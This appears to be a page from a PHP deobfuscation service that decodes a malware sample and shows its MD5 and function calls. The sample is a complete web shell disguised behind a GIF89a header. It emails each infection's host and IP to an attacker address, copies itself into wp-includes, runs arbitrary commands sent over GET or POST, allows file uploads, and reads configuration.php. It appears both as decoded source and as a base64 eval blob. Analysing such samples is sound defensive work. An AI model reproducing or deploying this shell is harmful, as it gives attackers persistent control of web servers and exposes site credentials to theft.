Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89a<?php $d='PD9waHAgZWNobyA8PDxodG1sDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04iIGhyZWY9Imh0d..

Decoded Output download

<?php echo <<<html
<link rel="SHORTCUT ICON" href="http://www.zeroto60times.com/blog/wp-content/uploads/2013/02/ferrari-cars-logo-emblem.jpg">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>T E A M 2 4 H O U R S U N K N O W N </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td>
html;

?>
<?php
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "ada yang inject 
$web$inj";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail('[email protected]', "$body", "Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/wp-simple.php";
    rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>T E A M C O D E R</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br><b> Dir : " . getcwd() . "</b><br>";
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        };
    } elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
function exe($cmd) {
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} elseif (is_resource($f = @popen($cmd,"r"))) {
		$buff = "";
		while(!@feof($f))
			$buff .= fread($f,1024);
		pclose($f);
		return $buff;
	}
}
echo ' < formmethod = "POST"action = "" > < br > < br > < fontsize = 2color = #888888><b>Command : </b><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
    echo '<br><br><form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File : </b></font><input type=hidden name="submit"><input type=file name="userfile" size=28><br><br><font size=2 color=#888888><b>New name : </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!$name = $_POST['newname']) {
            $name = $_FILES['userfile']['name'];
        };
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " :D ";
        }
    }
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . exe($cmd) . "</font></pre>";
    } elseif (isset($_GET['cmd'])) {
        $comd = $_GET['cmd'];
        echo "<pre><font size=3 color=#000000>" . exe($comd) . "</font></pre>";
    } elseif (isset($_GET['rf'])) {
        $rf = file_get_contents("../../configuration.php");
        echo $rf;
    } else {
        echo "<pre><font size=3 color=#000000>" . exe('ls -la') . "</font></pre>";
    } ?>
<?
echo <<<footer
</td>
    </tr>
  </table>
</div>
</body>
footer;

Did this file decode correctly?

Original Code

GIF89a<?php
$d='PD9waHAgZWNobyA8PDxodG1sDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04iIGhyZWY9Imh0dHA6Ly93d3cuemVyb3RvNjB0aW1lcy5jb20vYmxvZy93cC1jb250ZW50L3VwbG9hZHMvMjAxMy8wMi9mZXJyYXJpLWNhcnMtbG9nby1lbWJsZW0uanBnIj4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0tDQouc2VuZCB7Zm9udC1mYW1pbHk6ICJDb3VyaWVyIE5ldyIsIENvdXJpZXIsIG1vbm9zcGFjZTtib3JkZXI6bm9uZTsgZm9udC1zaXplOjE4cHg7IGJhY2tncm91bmQtY29sb3I6I0ZGRkZGRjsgZm9udC1ibGFjazpib2xkfQ0KI0xheWVyMSB7DQoJcG9zaXRpb246YWJzb2x1dGU7DQoJbGVmdDoyMDBweDsNCgl0b3A6M3B4Ow0KCXdpZHRoOjgwMHB4Ow0KCWhlaWdodDo2MzNweDsNCgl6LWluZGV4OjE7DQoJbWFyZ2luLXRvcDogMyU7DQoJbWFyZ2luLXJpZ2h0OiAzJTsNCglyaWdodDogMjAlOw0KCWJvdHRvbTogYXV0bzsNCgltYXJnaW4tYm90dG9tOiAzJTsNCgltYXJnaW4tbGVmdDogMyU7DQoJYm9yZGVyOiB0aGluIHNvbGlkICMwMDY2Q0M7DQoJZm9udC1mYW1pbHk6IkNvdXJpZXIgTmV3IiwgQ291cmllciwgbW9ub3NwYWNlOw0KCW92ZXJmbG93OiBhdXRvOw0KfQ0KLnN0eWxlMSB7DQoJY29sb3I6ICMwMDAwQ0M7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQotLT4NCjwvc3R5bGU+DQoNCjxib2R5Pg0KPGRpdiBpZD0iTGF5ZXIxIj48YnI+PGJyPjx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIj4NCiAgPHRyPg0KICAgIDx0ZD48ZGl2IGFsaWduPSJjZW50ZXIiIGNsYXNzPSJzdHlsZTEiPjxibGluaz5UIEUgQSBNIDIgNCBIIE8gVSBSIFMgVSBOIEsgTiBPIFcgTiA8L2JsaW5rPjwvZGl2PjwvdGQ+DQogIDwvdHI+DQo8L3RhYmxlPg0KDQogIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMjAiPg0KICAgIDx0cj4NCiAgICAgIDx0ZD4NCmh0bWw7DQoNCj8+DQo8P3BocA0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ2JhamFrJ10pKSB7DQogICAgJHZpc2l0Y291bnQgPSAwOw0KICAgICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICAgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KICAgICRib2R5ID0gImFkYSB5YW5nIGluamVjdCANCiR3ZWIkaW5qIjsNCiAgICAkc2FmZW0wZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7DQogICAgaWYgKCEkc2FmZW0wZGUpIHsNCiAgICAgICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA9IE9GRiI7DQogICAgfSBlbHNlIHsNCiAgICAgICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA9IE9OIjsNCiAgICB9Ow0KICAgICRzZXJwZXIgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTsNCiAgICAkaW5qZWt0b3IgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsNCiAgICBtYWlsKCdldmlsaW51eHNoZWxsQGdtYWlsLmNvbScsICIkYm9keSIsICJIYXNpbCBCYWpha2FuIGh0dHA6Ly8kd2ViJGluag0KJHNlY3VyaXR5DQpJUCBTZXJ2ZXIgPSAkc2VycGVyDQogSVAgSW5qZWN0b3I9ICRpbmpla3RvciIpOw0KICAgICRfU0VTU0lPTlsnYmFqYWsnXSA9IDA7DQp9IGVsc2Ugew0KICAgICRfU0VTU0lPTlsnYmFqYWsnXSsrOw0KfTsNCmlmIChpc3NldCgkX0dFVFsnY2xvbmUnXSkpIHsNCiAgICAkc291cmNlID0gJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddOw0KICAgICRkZXN0aSA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWluY2x1ZGVzL3dwLXNpbXBsZS5waHAiOw0KICAgIHJlbmFtZSgkc291cmNlLCAkZGVzdGkpOw0KfQ0KJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHsNCiAgICAkc2VjdXJpdHkgPSAiU0FGRV9NT0RFIDogT0ZGIjsNCn0gZWxzZSB7DQogICAgJHNlY3VyaXR5ID0gIlNBRkVfTU9ERSA6IE9OIjsNCn0NCmVjaG8gIjx0aXRsZT5UIEUgQSBNIEMgTyBEIEUgUjwvdGl0bGU+PGJyPiI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj4iIC4gJHNlY3VyaXR5IC4gIjwvYj48YnI+IjsNCiRjdXJfdXNlciA9ICIoIiAuIGdldF9jdXJyZW50X3VzZXIoKSAuICIpIjsNCmVjaG8gIjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPlVzZXIgOiB1aWQ9IiAuIGdldG15dWlkKCkgLiAkY3VyX3VzZXIgLiAiIGdpZD0iIC4gZ2V0bXlnaWQoKSAuICRjdXJfdXNlciAuICI8L2I+PGJyPiI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5VbmFtZSA6ICIgLiBwaHBfdW5hbWUoKSAuICI8L2I+PGJyPjxiPiBEaXIgOiAiIC4gZ2V0Y3dkKCkgLiAiPC9iPjxicj4iOw0KZnVuY3Rpb24gcHdkKCkgew0KICAgICRjd2QgPSBnZXRjd2QoKTsNCiAgICBpZiAoJHUgPSBzdHJycG9zKCRjd2QsICcvJykpIHsNCiAgICAgICAgaWYgKCR1ICE9IHN0cmxlbigkY3dkKSAtIDEpIHsNCiAgICAgICAgICAgIHJldHVybiAkY3dkIC4gJy8nOw0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgcmV0dXJuICRjd2Q7DQogICAgICAgIH07DQogICAgfSBlbHNlaWYgKCR1ID0gc3RycnBvcygkY3dkLCAnXCcpKXsNCmlmKCR1IT1zdHJsZW4oJGN3ZCktMSl7DQpyZXR1cm4gJGN3ZC4nXCc7fQ0KZWxzZXtyZXR1cm4gJGN3ZDt9Ow0KfTsNCn0NCmZ1bmN0aW9uIGV4ZSgkY21kKSB7DQoJaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSkgeyAJCQ0KCQlAb2Jfc3RhcnQoKTsgCQkNCgkJQHN5c3RlbSgkY21kKTsgCQkNCgkJJGJ1ZmYgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IAkJDQoJCUBvYl9lbmRfY2xlYW4oKTsgCQkNCgkJcmV0dXJuICRidWZmOyAJDQoJfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpIHsgCQkNCgkJQGV4ZWMoJGNtZCwkcmVzdWx0cyk7IAkJDQoJCSRidWZmID0gIiI7IAkJDQoJCWZvcmVhY2goJHJlc3VsdHMgYXMgJHJlc3VsdCkgeyAJCQkNCgkJCSRidWZmIC49ICRyZXN1bHQ7IAkJDQoJCX0gcmV0dXJuICRidWZmOyAJDQoJfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKSB7IAkJDQoJCUBvYl9zdGFydCgpOyAJCQ0KCQlAcGFzc3RocnUoJGNtZCk7IAkJDQoJCSRidWZmID0gQG9iX2dldF9jb250ZW50cygpOyAJCQ0KCQlAb2JfZW5kX2NsZWFuKCk7IAkJDQoJCXJldHVybiAkYnVmZjsgCQ0KCX0gZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKSB7IAkJDQoJCSRidWZmID0gQHNoZWxsX2V4ZWMoJGNtZCk7IAkJDQoJCXJldHVybiAkYnVmZjsgCQ0KCX0gZWxzZWlmIChpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY21kLCJyIikpKSB7DQoJCSRidWZmID0gIiI7DQoJCXdoaWxlKCFAZmVvZigkZikpDQoJCQkkYnVmZiAuPSBmcmVhZCgkZiwxMDI0KTsNCgkJcGNsb3NlKCRmKTsNCgkJcmV0dXJuICRidWZmOw0KCX0NCn0NCmVjaG8gJyA8IGZvcm1tZXRob2QgPSAiUE9TVCJhY3Rpb24gPSAiIiA+IDwgYnIgPiA8IGJyID4gPCBmb250c2l6ZSA9IDJjb2xvciA9ICM4ODg4ODg+PGI+Q29tbWFuZCA6IDwvYj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIj48aW5wdXQgdHlwZT0iU3VibWl0IiBuYW1lPSJjb21tYW5kIiB2YWx1ZT0iY29rIj48L2Zvcm0+JzsNCiAgICBlY2hvICc8YnI+PGJyPjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbiBtZXRob2Q9UE9TVD48Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5VcGxvYWQgRmlsZSA6IDwvYj48L2ZvbnQ+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InN1Ym1pdCI+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPSJ1c2VyZmlsZSIgc2l6ZT0yOD48YnI+PGJyPjxmb250IHNpemU9MiBjb2xvcj0jODg4ODg4PjxiPk5ldyBuYW1lIDogPC9iPjwvZm9udD48aW5wdXQgdHlwZT10ZXh0IHNpemU9MTUgbmFtZT0ibmV3bmFtZSIgY2xhc3M9dGE+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSJidCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQogICAgaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQogICAgICAgICR1cGxvYWRkaXIgPSBwd2QoKTsNCiAgICAgICAgaWYgKCEkbmFtZSA9ICRfUE9TVFsnbmV3bmFtZSddKSB7DQogICAgICAgICAgICAkbmFtZSA9ICRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTsNCiAgICAgICAgfTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sICR1cGxvYWRkaXIgLiAkbmFtZSk7DQogICAgICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndXNlcmZpbGUnXVsndG1wX25hbWUnXSwgJHVwbG9hZGRpciAuICRuYW1lKSkgew0KICAgICAgICAgICAgZWNobyAiVXBsb2FkIEZhaWxlZCI7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBlY2hvICJVcGxvYWQgU3VjY2VzcyB0byAiIC4gJHVwbG9hZGRpciAuICRuYW1lIC4gIiA6RCAiOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmIChpc3NldCgkX1BPU1RbJ2NvbW1hbmQnXSkpIHsNCiAgICAgICAgJGNtZCA9ICRfUE9TVFsnY21kJ107DQogICAgICAgIGVjaG8gIjxwcmU+PGZvbnQgc2l6ZT0zIGNvbG9yPSMwMDAwMDA+IiAuIGV4ZSgkY21kKSAuICI8L2ZvbnQ+PC9wcmU+IjsNCiAgICB9IGVsc2VpZiAoaXNzZXQoJF9HRVRbJ2NtZCddKSkgew0KICAgICAgICAkY29tZCA9ICRfR0VUWydjbWQnXTsNCiAgICAgICAgZWNobyAiPHByZT48Zm9udCBzaXplPTMgY29sb3I9IzAwMDAwMD4iIC4gZXhlKCRjb21kKSAuICI8L2ZvbnQ+PC9wcmU+IjsNCiAgICB9IGVsc2VpZiAoaXNzZXQoJF9HRVRbJ3JmJ10pKSB7DQogICAgICAgICRyZiA9IGZpbGVfZ2V0X2NvbnRlbnRzKCIuLi8uLi9jb25maWd1cmF0aW9uLnBocCIpOw0KICAgICAgICBlY2hvICRyZjsNCiAgICB9IGVsc2Ugew0KICAgICAgICBlY2hvICI8cHJlPjxmb250IHNpemU9MyBjb2xvcj0jMDAwMDAwPiIgLiBleGUoJ2xzIC1sYScpIC4gIjwvZm9udD48L3ByZT4iOw0KICAgIH0gPz4NCjw/DQplY2hvIDw8PGZvb3Rlcg0KPC90ZD4NCiAgICA8L3RyPg0KICA8L3RhYmxlPg0KPC9kaXY+DQo8L2JvZHk+DQpmb290ZXI7';
eval(base64_decode($d));
?>

Function Calls

base64_decode 1

Variables

$d PD9waHAgZWNobyA8PDxodG1sDQo8bGluayByZWw9IlNIT1JUQ1VUIElDT04i..

Stats

MD5 298b1b90acc556743470aad8968dcab2
Eval Count 1
Decode Time 49 ms